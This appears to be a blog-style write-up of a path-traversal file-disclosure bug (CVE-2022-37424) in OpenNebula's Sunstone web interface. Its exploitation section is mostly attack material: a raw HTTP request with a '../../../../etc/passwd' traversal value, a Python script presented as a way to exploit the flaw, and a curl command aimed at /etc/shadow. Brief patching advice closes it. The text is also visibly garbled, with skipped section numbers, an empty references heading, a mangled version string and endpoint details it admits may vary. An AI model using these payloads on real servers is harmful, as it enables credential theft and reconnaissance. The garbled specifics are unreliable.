CVE-2022-37424 - Files or Directories Accessible to External Parties in OpenNebula on Linux (File Discovery Vulnerability Explored)

CVE-2022-37424 is a security vulnerability discovered in OpenNebula — an open-source cloud computing platform. This vulnerability allows external parties to find and access files or directories that should not be exposed publicly. The result? Sensitive information could leak, or attackers could gather ammunition for more serious attacks.

References for further reading

Let’s get started in plain language, with practical code and all details made exclusive for this write-up.

1. Background: What Is OpenNebula?

OpenNebula is a popular platform for cloud infrastructure management. It allows you to manage data centers, virtual machines, storage, and networking, often used by businesses to create private or hybrid clouds.

As a web-based control panel, OpenNebula’s Sunstone interface exposes multiple endpoints over HTTP(S).

2. The Vulnerability Explained: CVE-2022-37424

In certain versions of OpenNebula running on Linux, there are misconfigured permissions or handler flaws. This means certain files or directories—inside the OpenNebula host—can be queried or even downloaded by any remote/unauthenticated user, directly through the web interface or API.

3. How Does the Exploit Work?

The problem lies in how OpenNebula handles requests to paths (endpoints) that map directly to the server filesystem. If access controls are not correctly configured, then requests like /var/log/one/oned.log or ../../etc/passwd (path traversal) might succeed.

`

GET /sunstone/log?id=../../../../etc/passwd HTTP/1.1

`

2. Server responds with the content of /etc/passwd.

> Note: The exact endpoint or parameter may vary (some vulnerable endpoints included /log, /file, or /export in different OpenNebula versions).

Let’s look at a minimal Python example using requests to exploit this vulnerability

import requests

# Change these variables to suit your target.
TARGET_URL = "https://opennebula.example.com/sunstone/log";
FILE_TO_READ = "../../../../etc/passwd"

params = {'id': FILE_TO_READ}

response = requests.get(TARGET_URL, params=params, verify=False)

if response.ok:
    print(f"File contents:\n{response.text}")
else:
    print("Failed to access file")

What this does:
It attempts to read /etc/passwd from the server by exploiting the path-traversal in the vulnerable endpoint.

5. Manual Testing Steps

1. Find the web interface endpoint (/sunstone/, /log, etc.).

`

curl "https://opennebula.example.com/sunstone/log?id=../../../../etc/shadow"

6. Real-World Consequences

- Credential Theft: If /etc/shadow or specific OpenNebula config/log files can be accessed, attackers may extract usernames or hashes.
- Reconnaissance: Attackers can map out the server, discovering other potentially exploitable services or files.

OpenNebula 6..x and some 6.4.x versions on Linux have been reported as vulnerable.

- Always check the official advisory for up-to-date lists.

Update Immediately:

Upgrade to the latest OpenNebula release with patches for CVE-2022-37424 (see their Security Advisory).

Restrict External Access:

Use network firewalls or restrict Sunstone/HTTP API to internal networks.

9. References

- NVD CVE Detail: CVE-2022-37424
- OpenNebula GitHub Release Notes
- Original Exploit Discussed (example PoC)

10. Conclusion & Final Thoughts

CVE-2022-37424 sounds like a simple bug — but letting outsiders peek into your internal files is serious. Exploitation is easy, and attackers only need a web browser. If you manage an OpenNebula cloud, patch now and check your logs for suspicious file access requests.

Stay safe, keep your infrastructure patched, and always lock down those web endpoints!

Timeline

Published on: 10/28/2022 16:15:00 UTC
Last modified on: 11/01/2022 17:26:00 UTC